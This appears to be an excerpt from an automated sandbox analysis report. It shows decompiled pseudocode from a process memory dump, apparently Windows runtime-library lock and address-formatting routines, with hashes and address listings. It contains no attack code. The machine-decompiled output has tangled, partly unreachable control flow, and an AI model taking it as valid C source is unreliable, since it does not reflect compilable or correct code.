                                                                                                                                                            									if(_t51 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t106 =  *(_t144 + 4);
                                                                                                                                                            									_t126 =  *_t144;
                                                                                                                                                            									_t86 = E00994FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t126);
                                                                                                                                                            									_push(_t86);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            									_t130 = _t130 + 1;
                                                                                                                                                            									_t160 = _t158 + 0x28;
                                                                                                                                                            									__eflags = _t130 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E009D217A(_t106, __eflags, _t96);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E009A3F92();
                                                                                                                                                            									_t158 = _t160 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t51;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E00993915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L32:
                                                                                                                                                            										__eflags = _a8;
                                                                                                                                                            										if(_a8 == 0) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            										_t119 = _t96 + 0x24;
                                                                                                                                                            										_t107 = 1;
                                                                                                                                                            										asm("lock xadd [eax], ecx");
                                                                                                                                                            										_t56 =  *(_t96 + 0x28);
                                                                                                                                                            										_a4 = _t56;
                                                                                                                                                            										__eflags = _t56;
                                                                                                                                                            										if(_t56 != 0) {
                                                                                                                                                            											L40:
                                                                                                                                                            											_t128 = 0;
                                                                                                                                                            											__eflags = 0;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            												asm("sbb esi, esi");
                                                                                                                                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a301c0;
                                                                                                                                                            												_push(_t138);
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_t58 = E0094F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                            												__eflags = _t58 - 0x102;
                                                                                                                                                            												if(_t58 != 0x102) {
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t107 =  *(_t138 + 4);
                                                                                                                                                            												_t125 =  *_t138;
                                                                                                                                                            												_t75 = E00994FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                            												_push(_t125);
                                                                                                                                                            												_push(_t75);
                                                                                                                                                            												E009A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                            												E009A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            												_t128 = _t128 + 1;
                                                                                                                                                            												_t159 = _t158 + 0x28;
                                                                                                                                                            												__eflags = _t128 - 2;
                                                                                                                                                            												if(__eflags > 0) {
                                                                                                                                                            													E009D217A(_t107, __eflags, _t96);
                                                                                                                                                            												}
                                                                                                                                                            												_push("RTL: Re-Waiting\n");
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_push(0x65);
                                                                                                                                                            												E009A3F92();
                                                                                                                                                            												_t158 = _t159 + 0xc;
                                                                                                                                                            											}
                                                                                                                                                            											__eflags = _t58;
                                                                                                                                                            											if(__eflags < 0) {
                                                                                                                                                            												_push(_t58);
                                                                                                                                                            												E00993915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                            												asm("int3");
                                                                                                                                                            												_t61 =  *_t107;
                                                                                                                                                            												 *_t107 = 0;
                                                                                                                                                            												__eflags = _t61;
                                                                                                                                                            												if(_t61 == 0) {
                                                                                                                                                            													L1:
                                                                                                                                                            													_t63 = E00975384(_t138 + 0x24);
                                                                                                                                                            													if(_t63 != 0) {
                                                                                                                                                            														goto L52;
                                                                                                                                                            													} else {
                                                                                                                                                            														goto L2;
                                                                                                                                                            													}
                                                                                                                                                            												} else {
                                                                                                                                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                            													_push( &_a4);
                                                                                                                                                            													_push(_t61);
                                                                                                                                                            													_t70 = E0094F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                            													__eflags = _t70;
                                                                                                                                                            													if(__eflags >= 0) {
                                                                                                                                                            														goto L1;
                                                                                                                                                            													} else {
                                                                                                                                                            														_push(_t70);
                                                                                                                                                            														E00993915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                            														L52:
                                                                                                                                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            														_push( &_a4);
                                                                                                                                                            														_push(1);
                                                                                                                                                            														_t63 = E0094F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            														__eflags = _t63;
                                                                                                                                                            														if(__eflags >= 0) {
                                                                                                                                                            															L2:
                                                                                                                                                            															return _t63;
                                                                                                                                                            														} else {
                                                                                                                                                            															_push(_t63);
                                                                                                                                                            															E00993915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            															_push( &_a4);
                                                                                                                                                            															_push(1);
                                                                                                                                                            															_t63 = E0094F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            															__eflags = _t63;
                                                                                                                                                            															if(__eflags >= 0) {
                                                                                                                                                            																goto L2;
                                                                                                                                                            															} else {
                                                                                                                                                            																_push(_t63);
                                                                                                                                                            																_t66 = E00993915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                            																asm("int3");
                                                                                                                                                            																while(1) {
                                                                                                                                                            																	_t110 = _t66;
                                                                                                                                                            																	__eflags = _t66 - 1;
                                                                                                                                                            																	if(_t66 != 1) {
                                                                                                                                                            																		break;
                                                                                                                                                            																	}
                                                                                                                                                            																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                            																	_t66 = _t110;
                                                                                                                                                            																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            																	__eflags = _t66 - _t110;
                                                                                                                                                            																	if(_t66 != _t110) {
                                                                                                                                                            																		continue;
                                                                                                                                                            																	} else {
                                                                                                                                                            																		_t67 =  *[fs:0x18];
                                                                                                                                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                            																		return _t67;
                                                                                                                                                            																	}
                                                                                                                                                            																	goto L59;
                                                                                                                                                            																}
                                                                                                                                                            																E00975329(_t110, _t138);
                                                                                                                                                            																_t69 = E009753A5(_t138, 1);
                                                                                                                                                            																return _t69;
                                                                                                                                                            															}
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												_t56 =  *(_t96 + 0x28);
                                                                                                                                                            												goto L3;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											_t107 =  *_t119;
                                                                                                                                                            											__eflags = _t107;
                                                                                                                                                            											if(__eflags > 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													_t81 = _t107;
                                                                                                                                                            													asm("lock cmpxchg [edi], esi");
                                                                                                                                                            													__eflags = _t81 - _t107;
                                                                                                                                                            													if(_t81 == _t107) {
                                                                                                                                                            														break;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t81;
                                                                                                                                                            													__eflags = _t81;
                                                                                                                                                            													if(_t81 > 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													}
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t56 = _a4;
                                                                                                                                                            												__eflags = _t107;
                                                                                                                                                            											}
                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													L3:
                                                                                                                                                            													__eflags = _t56;
                                                                                                                                                            													if(_t56 != 0) {
                                                                                                                                                            														goto L32;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t107 | 0xffffffff;
                                                                                                                                                            													_t56 = 0;
                                                                                                                                                            													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            													__eflags = 0;
                                                                                                                                                            													if(0 != 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													} else {
                                                                                                                                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            														return 1;
                                                                                                                                                            													}
                                                                                                                                                            													goto L59;
                                                                                                                                                            												}
                                                                                                                                                            												continue;
                                                                                                                                                            											} else {
                                                                                                                                                            												goto L40;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            										goto L59;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = 0;
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t115 =  *(_t96 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t106 =  *_t49;
                                                                                                                                                            								__eflags = _t106;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t93 = _t106;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t93 - _t106;
                                                                                                                                                            										if(_t93 == _t106) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t106 = _t93;
                                                                                                                                                            										__eflags = _t93;
                                                                                                                                                            										if(_t93 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = _t106;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L23;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L59;
                                                                                                                                                            					}
                                                                                                                                                            					_t84 = _t115;
                                                                                                                                                            					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                            					__eflags = _t84 - _t115;
                                                                                                                                                            					if(_t84 != _t115) {
                                                                                                                                                            						_t115 = _t84;
                                                                                                                                                            						goto L7;
                                                                                                                                                            					} else {
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L59:
                                                                                                                                                            			}




































                                                                                                                                                            0x009b2336
                                                                                                                                                            0x009b233b
                                                                                                                                                            0x009b233d
                                                                                                                                                            0x009b2350
                                                                                                                                                            0x009b2351
                                                                                                                                                            0x009b2356
                                                                                                                                                            0x009b2359
                                                                                                                                                            0x009b2359
                                                                                                                                                            0x009b235b
                                                                                                                                                            0x009b235d
                                                                                                                                                            0x00975367
                                                                                                                                                            0x0097536b
                                                                                                                                                            0x00975372
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2363
                                                                                                                                                            0x009b2363
                                                                                                                                                            0x009b2369
                                                                                                                                                            0x009b236a
                                                                                                                                                            0x009b236c
                                                                                                                                                            0x009b2371
                                                                                                                                                            0x009b2373
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2379
                                                                                                                                                            0x009b2379
                                                                                                                                                            0x009b237a
                                                                                                                                                            0x009b237f
                                                                                                                                                            0x009b237f
                                                                                                                                                            0x009b2385
                                                                                                                                                            0x009b2386
                                                                                                                                                            0x009b2389
                                                                                                                                                            0x009b238e
                                                                                                                                                            0x009b2390
                                                                                                                                                            0x00975378
                                                                                                                                                            0x0097537c
                                                                                                                                                            0x009b2396
                                                                                                                                                            0x009b2396
                                                                                                                                                            0x009b2397
                                                                                                                                                            0x009b239c
                                                                                                                                                            0x009b23a2
                                                                                                                                                            0x009b23a3
                                                                                                                                                            0x009b23a6
                                                                                                                                                            0x009b23ab
                                                                                                                                                            0x009b23ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b23b3
                                                                                                                                                            0x009b23b3
                                                                                                                                                            0x009b23b4
                                                                                                                                                            0x009b23b9
                                                                                                                                                            0x009b23ba
                                                                                                                                                            0x009b23ba
                                                                                                                                                            0x009b23bc
                                                                                                                                                            0x009b23bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9153
                                                                                                                                                            0x009a9158
                                                                                                                                                            0x009a915a
                                                                                                                                                            0x009a915e
                                                                                                                                                            0x009a9160
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9166
                                                                                                                                                            0x009a9166
                                                                                                                                                            0x009a9171
                                                                                                                                                            0x009a9176
                                                                                                                                                            0x009a9176
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9160
                                                                                                                                                            0x009b23c6
                                                                                                                                                            0x009b23ce
                                                                                                                                                            0x009b23d7
                                                                                                                                                            0x009b23d7
                                                                                                                                                            0x009b23ad
                                                                                                                                                            0x009b2390
                                                                                                                                                            0x009b2373
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x009b2291
                                                                                                                                                            0x009b2291
                                                                                                                                                            0x009b2293
                                                                                                                                                            0x009b2295
                                                                                                                                                            0x009b229a
                                                                                                                                                            0x009b22a1
                                                                                                                                                            0x009b22a3
                                                                                                                                                            0x009b22a7
                                                                                                                                                            0x009b22a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22ab
                                                                                                                                                            0x009b22ad
                                                                                                                                                            0x009b22af
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22af
                                                                                                                                                            0x009b22b1
                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753cb
                                                                                                                                                            0x009753ce
                                                                                                                                                            0x009753d0
                                                                                                                                                            0x009753d4
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753d8
                                                                                                                                                            0x009753e3
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b228f
                                                                                                                                                            0x009b2349
                                                                                                                                                            0x009b234d
                                                                                                                                                            0x009b2251
                                                                                                                                                            0x009b2251
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2251
                                                                                                                                                            0x009b21a4
                                                                                                                                                            0x009b21a4
                                                                                                                                                            0x009b21a6
                                                                                                                                                            0x009b21a8
                                                                                                                                                            0x009b21ac
                                                                                                                                                            0x009b21b6
                                                                                                                                                            0x009b21b8
                                                                                                                                                            0x009b21bc
                                                                                                                                                            0x009b21be
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21c0
                                                                                                                                                            0x009b21c2
                                                                                                                                                            0x009b21c4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21c4
                                                                                                                                                            0x009b21c6
                                                                                                                                                            0x009b21c6
                                                                                                                                                            0x009b21c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21c8
                                                                                                                                                            0x009b21a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2183
                                                                                                                                                            0x0099057b
                                                                                                                                                            0x0099057d
                                                                                                                                                            0x00990581
                                                                                                                                                            0x00990583
                                                                                                                                                            0x009b2178
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990589
                                                                                                                                                            0x0099058f
                                                                                                                                                            0x0099058f
                                                                                                                                                            0x00990583
                                                                                                                                                            0x00000000

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B2206
Strings
Memory Dump Source
• Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-4236105082
                                                                                                                                                            • Opcode ID: e6af5e30518601338a73e8195e75c99cc5eb28999f330ef63dbc9bfa25afd2bd
                                                                                                                                                            • Instruction ID: 9bae278fc26c2c3049b444dadc1e273a5201bef463301e39459e623b54441f4a
                                                                                                                                                            • Opcode Fuzzy Hash: e6af5e30518601338a73e8195e75c99cc5eb28999f330ef63dbc9bfa25afd2bd
                                                                                                                                                            • Instruction Fuzzy Hash: C05137317442016FEB15CB19CC82FA633ADEBD4725F218229FD59DF285DA31EC828B90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E009914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v10;
                                                                                                                                                            				char _v140;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t24;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				signed int _t29;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                            				void* _t54;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            
                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                            				_t24 =  *0xa32088; // 0x7769a8cb
                                                                                                                                                            				_v8 = _t24 ^ _t57;
                                                                                                                                                            				_t45 = _a16;
                                                                                                                                                            				_t53 = _a4;
                                                                                                                                                            				_t52 = _a20;
                                                                                                                                                            				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                            					L10:
                                                                                                                                                            					_t26 = 0xc000000d;
                                                                                                                                                            				} else {
                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                            						if( *_t52 == _t45) {
                                                                                                                                                            							goto L3;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						L3:
                                                                                                                                                            						_t28 =  &_v140;
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_push("[");
                                                                                                                                                            							_push(0x41);
                                                                                                                                                            							_push( &_v140);
                                                                                                                                                            							_t29 = E00987707();
                                                                                                                                                            							_t58 = _t58 + 0xc;
                                                                                                                                                            							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                            						}
                                                                                                                                                            						_t54 = E009913CB(_t53, _t28);
                                                                                                                                                            						if(_a8 != 0) {
                                                                                                                                                            							_t34 = E00987707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t34 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_t40 = E00987707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t40 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                            						 *_t52 = _t53;
                                                                                                                                                            						if( *_t52 < _t53) {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						} else {
                                                                                                                                                            							E00952340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                            							_t26 = 0;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return E0095E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                            			}

                                                                                                                                                            APIs
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 009BEA22
                                                                                                                                                              • Part of subcall function 009913CB: ___swprintf_l.LIBCMT ref: 0099146B
                                                                                                                                                              • Part of subcall function 009913CB: ___swprintf_l.LIBCMT ref: 00991490
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 0099156D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                            • Opcode ID: 2b4d75e715357200838e301fb6025e603f26c7bbc6c214ac4444dab21ef146d2
                                                                                                                                                            • Instruction ID: f2cbd7dd39508b542c75f5ad5c3cbe0b92ca524cec0bdfd409af0fd2f96f7965
                                                                                                                                                            • Opcode Fuzzy Hash: 2b4d75e715357200838e301fb6025e603f26c7bbc6c214ac4444dab21ef146d2
                                                                                                                                                            • Instruction Fuzzy Hash: 9821C17290021A9BCF21EE58CC41AEAB3BCBB90710F564451FC46D3240DB74EE588BE2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                            			E009753A5(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t32;
                                                                                                                                                            				signed int _t37;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				signed int _t42;
                                                                                                                                                            				void* _t45;
                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				signed int _t64;
                                                                                                                                                            				signed int _t71;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                            				signed int* _t79;
                                                                                                                                                            				void* _t85;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				void* _t105;
                                                                                                                                                            
                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                            				_t32 =  *(_t64 + 0x28);
                                                                                                                                                            				_t71 = _t64 + 0x28;
                                                                                                                                                            				_push(_t92);
                                                                                                                                                            				if(_t32 < 0) {
                                                                                                                                                            					_t78 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                            						goto L3;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t32 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [ecx], eax");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L3:
                                                                                                                                                            					_push(_t86);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L4:
                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t79 = _t64 + 0x24;
                                                                                                                                                            							_t71 = 1;
                                                                                                                                                            							asm("lock xadd [eax], ecx");
                                                                                                                                                            							_t32 =  *(_t64 + 0x28);
                                                                                                                                                            							_a4 = _t32;
                                                                                                                                                            							__eflags = _t32;
                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                            								L19:
                                                                                                                                                            								_t86 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a301c0;
                                                                                                                                                            									_push(_t92);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t37 = E0094F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                            									__eflags = _t37 - 0x102;
                                                                                                                                                            									if(_t37 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t71 =  *(_t92 + 4);
                                                                                                                                                            									_t85 =  *_t92;
                                                                                                                                                            									_t51 = E00994FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t85);
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                            									_t86 = _t86 + 1;
                                                                                                                                                            									_t105 = _t104 + 0x28;
                                                                                                                                                            									__eflags = _t86 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E009D217A(_t71, __eflags, _t64);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E009A3F92();
                                                                                                                                                            									_t104 = _t105 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t37;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t37);
                                                                                                                                                            									E00993915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									_t40 =  *_t71;
                                                                                                                                                            									 *_t71 = 0;
                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                            										L1:
                                                                                                                                                            										_t42 = E00975384(_t92 + 0x24);
                                                                                                                                                            										if(_t42 != 0) {
                                                                                                                                                            											goto L31;
                                                                                                                                                            										} else {
                                                                                                                                                            											goto L2;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                            										_push( &_a4);
                                                                                                                                                            										_push(_t40);
                                                                                                                                                            										_t49 = E0094F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                            										__eflags = _t49;
                                                                                                                                                            										if(__eflags >= 0) {
                                                                                                                                                            											goto L1;
                                                                                                                                                            										} else {
                                                                                                                                                            											_push(_t49);
                                                                                                                                                            											E00993915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                            											L31:
                                                                                                                                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            											_push( &_a4);
                                                                                                                                                            											_push(1);
